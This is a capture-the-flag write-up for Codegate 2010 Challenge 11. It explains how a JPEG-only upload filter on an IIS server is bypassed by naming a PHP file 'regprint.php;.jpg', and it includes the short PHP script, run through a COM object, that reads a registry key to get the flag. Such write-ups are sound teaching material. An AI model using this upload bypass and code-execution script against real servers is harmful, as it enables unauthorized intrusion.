Codegate 2010 Challenge 11 writeup
March 18, 2010 by Hiếu Lê · 7 Comments
Summary
http://ctf6.codegate.org/31337_/index.html
Get a value of HKLM\Software\codegate2010, it’s the flag.
Analysis
At first when accessing the url, it shows up a page allow you to upload a jpeg image and only .jpg files. As I noticed, it serves by IIS. Suddenly, I remember of the vulnerability of IIS in processing image files. A little bit google show me the result. Ah ha, let’s test it by uploading a php file likes “test.php;.jpg”. Incredible!
Now, the only thing we have to do is writing some lines of php to read the REG key.
regprint.php;.jpg
<?
$shell = new COM("WScript.Shell") or die("Requires Windows Scripting Host");
$devenvpath=$shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\codegate2010");
echo $devenvpath
?>
Then, execute it by http://ctf6.codegate.org/31337_/upload/regprint.php;.jpg
LollerSkaterz_From_RoflCopters_With_Guinness
Easy game with 1200 point.
Vulnerability
In facts, after the game thaidn said that it’s a fault of deploying the challenge, it’s designed to be passed by a 0-day of core php.
References
- http://soroush.secproject.com/blog/2009/12/microsoft-iis-semi-colon-vulnerability/
- Keywords: IIS, semi-colon vulnerability
In fact, this question is not readily difficult and worth 1200 points.
Do you know the designed attack vector of this challenge?
You mean the 0-day of php core? Definitely not, I haven’t taken into account it and I do not intend to look at it too, sorry bro. Just playing ;-)